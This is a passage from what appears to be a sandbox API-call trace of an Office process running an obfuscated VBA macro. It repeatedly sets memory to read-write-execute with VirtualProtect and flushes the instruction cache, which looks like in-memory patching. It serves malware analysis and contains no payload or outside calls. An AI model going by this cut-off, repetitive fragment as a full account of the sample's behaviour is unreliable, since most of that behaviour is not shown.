dwSize=0x14) returned 1 [0095.954] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.955] GetCurrentProcess () returned 0xffffffff [0095.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.955] GetCurrentProcess () returned 0xffffffff [0095.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.955] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.955] GetCurrentProcess () returned 0xffffffff [0095.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.955] GetCurrentProcess () returned 0xffffffff [0095.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.955] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.956] GetCurrentProcess () returned 0xffffffff [0095.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.956] GetCurrentProcess () returned 0xffffffff [0095.956] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.956] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.957] GetCurrentProcess () returned 0xffffffff [0095.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.957] GetCurrentProcess () returned 0xffffffff [0095.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.957] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.957] GetCurrentProcess () returned 0xffffffff [0095.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.957] GetCurrentProcess () returned 0xffffffff [0095.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.957] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.958] GetCurrentProcess () returned 0xffffffff [0095.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.958] GetCurrentProcess () returned 0xffffffff [0095.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.958] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.959] GetCurrentProcess () returned 0xffffffff [0095.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.959] GetCurrentProcess () returned 0xffffffff [0095.959] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.959] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.960] GetCurrentProcess () returned 0xffffffff [0095.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.960] GetCurrentProcess () returned 0xffffffff [0095.960] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.960] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.964] GetCurrentProcess () returned 0xffffffff [0095.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.964] GetCurrentProcess () returned 0xffffffff [0095.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.964] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.964] GetCurrentProcess () returned 0xffffffff [0095.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.964] GetCurrentProcess () returned 0xffffffff [0095.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.964] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.965] GetCurrentProcess () returned 0xffffffff [0095.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.965] GetCurrentProcess () returned 0xffffffff [0095.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.965] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.966] GetCurrentProcess () returned 0xffffffff [0095.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.966] GetCurrentProcess () returned 0xffffffff [0095.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.966] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.967] GetCurrentProcess () returned 0xffffffff [0095.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.967] GetCurrentProcess () returned 0xffffffff [0095.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.967] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.967] GetCurrentProcess () returned 0xffffffff [0095.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.968] GetCurrentProcess () returned 0xffffffff [0095.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.968] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.968] GetCurrentProcess () returned 0xffffffff [0095.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.968] GetCurrentProcess () returned 0xffffffff [0095.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.968] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.971] GetCurrentProcess () returned 0xffffffff [0095.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.971] GetCurrentProcess () returned 0xffffffff [0095.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.971] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.972] GetCurrentProcess () returned 0xffffffff [0095.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.972] GetCurrentProcess () returned 0xffffffff [0095.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.972] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.973] GetCurrentProcess () returned 0xffffffff [0095.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.973] GetCurrentProcess () returned 0xffffffff [0095.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.973] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.974] GetCurrentProcess () returned 0xffffffff [0095.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.974] GetCurrentProcess () returned 0xffffffff [0095.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.974] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.975] GetCurrentProcess () returned 0xffffffff [0095.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.975] GetCurrentProcess () returned 0xffffffff [0095.975] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.975] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.976] GetCurrentProcess () returned 0xffffffff [0095.976] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.978] GetCurrentProcess () returned 0xffffffff [0095.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.978] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.980] GetCurrentProcess () returned 0xffffffff [0095.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.980] GetCurrentProcess () returned 0xffffffff [0095.980] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.981] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.981] GetCurrentProcess () returned 0xffffffff [0095.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.981] GetCurrentProcess () returned 0xffffffff [0095.981] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.981] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.984] GetCurrentProcess () returned 0xffffffff [0095.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.984] GetCurrentProcess () returned 0xffffffff [0095.984] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.984] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.985] GetCurrentProcess () returned 0xffffffff [0095.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.985] GetCurrentProcess () returned 0xffffffff [0095.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.985] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.986] GetCurrentProcess () returned 0xffffffff [0095.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.986] GetCurrentProcess () returned 0xffffffff [0095.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.986] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.987] GetCurrentProcess () returned 0xffffffff [0095.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.987] GetCurrentProcess () returned 0xffffffff [0095.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.987] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.987] GetCurrentProcess () returned 0xffffffff [0095.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.987] GetCurrentProcess () returned 0xffffffff [0095.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.987] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.988] GetCurrentProcess () returned 0xffffffff [0095.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.988] GetCurrentProcess () returned 0xffffffff [0095.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.988] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.989] GetCurrentProcess () returned 0xffffffff [0095.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.989] GetCurrentProcess () returned 0xffffffff [0095.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.989] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.990] GetCurrentProcess () returned 0xffffffff [0095.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.990] SetErrorMode (uMode=0x8001) returned 0x8001 [0095.990] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0095.990] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0095.991] SetErrorMode (uMode=0x8001) returned 0x8001 [0095.992] GetProcAddress (hModule=0x693e0000, lpProcName=0x278) returned 0x694663c4 [0096.001] GetAsyncKeyState (vKey=3) returned 0 [0096.001] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.001] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.001] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.001] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.002] CRetailMalloc_Alloc () returned 0xcc06758 [0096.002] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.002] memcpy (in: _Dst=0xb2a5270, _Src=0x197404, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0096.002] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a80386, cbMultiByte=5, lpWideCharStr=0x197204, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0096.002] CRetailMalloc_Realloc () returned 0xb42e470 [0096.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300386, cbMultiByte=5, lpWideCharStr=0x197264, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0096.002] CRetailMalloc_Realloc () returned 0xb51a090 [0096.003] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.005] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 1 [0096.005] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 1 [0096.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82e62, cbMultiByte=9, lpWideCharStr=0x197204, cchWideChar=10 | out: lpWideCharStr="——––—–––") returned 9 [0096.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a403de, cbMultiByte=9, lpWideCharStr=0x197264, cchWideChar=10 | out: lpWideCharStr="——––—–––") returned 9 [0096.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a403de, cbMultiByte=9, lpWideCharStr=0x197264, cchWideChar=10 | out: lpWideCharStr="——––—–––") returned 9 [0096.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a403de, cbMultiByte=9, lpWideCharStr=0x197264, cchWideChar=10 | out: lpWideCharStr="——––—–––") returned 9 [0096.009] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 1 [0096.009] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x96\x96\x96", cchCount2=-1) returned 1 [0096.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a403de, cbMultiByte=9, lpWideCharStr=0x197264, cchWideChar=10 | out: lpWideCharStr="——––—–––") returned 9 [0096.009] CRetailMalloc_Alloc () returned 0xf4a26a0 [0096.009] _mbscpy_s (in: _Dst=0xf4a26a0, _DstSizeInBytes=0x9, _Src=0x9a403de | out: _Dst=0xf4a26a0) returned 0x0 [0096.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40c0e, cbMultiByte=16, lpWideCharStr=0x197274, cchWideChar=17 | out: lpWideCharStr="_B_var_——––—–––") returned 16 [0096.010] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x9, _Src=0x9a403de | out: _Dst=0x1972dc) returned 0x0 [0096.010] CRetailMalloc_Free () returned 0x1 [0096.010] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0096.010] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.010] memcpy (in: _Dst=0xb2a516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0096.010] memcpy (in: _Dst=0xb2a5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.010] memcpy (in: _Dst=0xb2a5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.010] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.010] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0096.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0096.011] memcpy (in: _Dst=0xcc067d0, _Src=0x197484, _Size=0x18 | out: _Dst=0xcc067d0) returned 0xcc067d0 [0096.011] CRetailMalloc_Realloc () returned 0xcc06758 [0096.011] CRetailMalloc_Free () returned 0x1 [0096.011] GetCurrentProcess () returned 0xffffffff [0096.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0096.011] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.013] GetCurrentProcess () returned 0xffffffff [0096.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0096.014] GetCurrentProcess () returned 0xffffffff [0096.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0096.015] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.016] GetCurrentProcess () returned 0xffffffff [0096.016] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0096.016] GetCurrentProcess () returned 0xffffffff [0096.016] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0096.016] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.023] GetCurrentProcess () returned 0xffffffff [0096.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0096.023] GetCurrentProcess () returned 0xffffffff [0096.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0096.023] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.025] GetCurrentProcess () returned 0xffffffff [0096.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0096.025] GetCurrentProcess () returned 0xffffffff [0096.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0096.026] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.028] GetCurrentProcess () returned 0xffffffff [0096.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0096.028] GetCurrentProcess () returned 0xffffffff [0096.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0096.028] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.029] GetCurrentProcess () returned 0xffffffff [0096.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0096.030] GetCurrentProcess () returned 0xffffffff [0096.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0096.031] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.031] GetCurrentProcess () returned 0xffffffff [0096.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0096.031] GetCurrentProcess () returned 0xffffffff [0096.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0096.031] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.039] GetCurrentProcess () returned 0xffffffff [0096.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0096.039] GetCurrentProcess () returned 0xffffffff [0096.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0096.039] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.040] GetCurrentProcess () returned 0xffffffff [0096.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0096.040] GetCurrentProcess () returned 0xffffffff [0096.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0096.040] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.041] GetCurrentProcess () returned 0xffffffff [0096.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0096.041] GetCurrentProcess () returned 0xffffffff [0096.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0096.041] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.044] GetCurrentProcess () returned 0xffffffff [0096.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0096.044] GetCurrentProcess () returned 0xffffffff [0096.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0096.044] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.045] GetCurrentProcess () returned 0xffffffff [0096.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0096.045] GetCurrentProcess () returned 0xffffffff [0096.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0096.045] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.046] GetCurrentProcess () returned 0xffffffff [0096.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0096.046] GetCurrentProcess () returned 0xffffffff [0096.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0096.046] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0096.046] GetCurrentProcess () returned 0xffffffff [0096.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0096.046] GetCurrentProcess () returned 0xffffffff [0096.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 